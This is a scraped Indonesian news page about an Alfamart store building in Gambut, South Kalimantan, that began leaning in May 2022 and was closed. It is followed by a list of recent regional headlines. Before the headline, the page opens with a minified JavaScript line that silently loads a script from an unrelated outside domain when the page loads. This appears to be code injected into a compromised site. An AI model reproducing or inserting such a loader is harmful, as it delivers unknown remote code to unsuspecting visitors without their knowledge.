(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Terlihat Miring ke Kiri, Bangunan Alfamart KM 14,400 Gambut Akhirnya Ditutup


KANALKALIMANTAN.COM, MARTAPURA – Bangunan rest area Alfamart satu lantai di Jalan A Yani, km 14,400 Malintang Baru, Kecamatan Gambut, Kabupaten Banjar, Kalimantan Selatan tiba-tiba terlihat miring.

Hal tersebut terpantau dari video yang dibagikan oleh Tim Kerukunan Relawan Gambut pada Sabtu (7/5/2022) sekitar pukul 22.30 Wita.

Herman, salah seorang tim Kerukunan Relawan Gambut menerangkan bahwa status bangunan ruko fitel modern Alfamart yang berada di sebelah Bank BRI Gambut tersebut terlihat miring ke kiri jika dilihat dari depan.

 

 

Baca juga: Kepala Bocah Tersangkut Toples Kaleng, Warganet: Kasian Tapi Ingin Ketawa

“Kawan-kawan tim kerukunan relawan Gambut di lokasi untuk mengantisipasi, karena statusnya memang miring,” ungkap Herman, Sabtu (7/5/2022) malam.

Dikatakannya, atas kejadian tersebut beberapa relawan telah bersiaga di lokasi untuk mengantisipasi terjadinya keambrukan bangunan.

Menurut keterangan dari para pegawai Alfamart bahwa bangunan lantai ruko sudah terlihat amblas di bagian tengah, karena takut, pihaknya telah menutup toko sementara dan tidak akan melakukan aktivitas hingga beberapa hari ke depan.

Inur (40) seorang saksi yang merupakan penjual bubur kacang di samping ruko Alfamart menjelaskan jika Alfamart dalam kondisi tutup sejak pukul 19.00 Wita.

“Alfamart km 14,4 tutup sementara karena bangunan sudah miring sekali condong ke arah gudang, jadi kata pegawai alfamart hntuk beberapa waktu ke depan alfamart tidak ada aktivitas, artinya tutup,” ungkap Inur.

Sementara itu, pihak relawan mengimbau agar masyarakar tidak perlu panik dan untuk menghindari hal-hal yang tidak diinginkan hendaknya masyarakat tidak mendekat ke wilayah bangun ruko Alfamart tersbut.

“Kepada kawan kawan tetap tenang jangan panik, dan jangan mendekat dulu ke daerah tersebut,” tutup Herman. (kanalkalimantan.com/wanda)

Reporter: wanda
Editor: cell


Risa

Recent Posts

Tugu Adipura Banjarbaru Layak Dipasang APILL, Tunggu Rekomendasi Resmi BPTD dan BPJN

KANALKALIMANTAN.COM, BANJARBARU - Ruas kawasan Tugu Adipura di Jalan Ahmad Yani Kota Banjarbaru, Kalimantan Selatan… Read More

8 jam ago

Kumpulkan Caleg Terpilih dan Pengurus DPD, PAN Kalsel ‘Panaskan Mesin’ Hadapi Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Pasca pelaksanaan Pemilu 2024, Dewan Pimpinan Wilayah (DPW) Partai Amanat Nasional (PAN)… Read More

9 jam ago

Silaturahmi Camat Lurah RT RW, Paman Birin Cerita Pernah Jadi Lurah dan Sekcam

KANALKALIMANTAN.COM, BANJARMASIN - Gubernur Kalimantan Selatan (Kalsel) H Sahbirin Noor bercerita perjalanan karirnya sebelum menjadi… Read More

13 jam ago

APILL Terpasang di Samsat Banjarbaru, Dua Jalan Jadi Perempatan

DPUPR Banjarbaru akan Bongkar Median Sepanjang 35 Meter Read More

13 jam ago

Chaos Banjarmasin di Atas Kanvas, Tragedi Kelam Jumat Kelabu 23 Mei 1997

“Setiap goresan kuas di lukisan ini, saya terbayang, merasakan terbawa kedalam suasana, di saat kerusuhan… Read More

16 jam ago

Perpisahan Siswa SMAN 1 Kapuas, Erlin Hardi : Belajar, Belajar, dan Belajar!

KANALKALIMANTAN.COM, KUALA KAPUAS - Pendidikan merupakan tolak ukur kemajuan suatu bangsa. Dengan pendidikan yang baik… Read More

18 jam ago

This website uses cookies.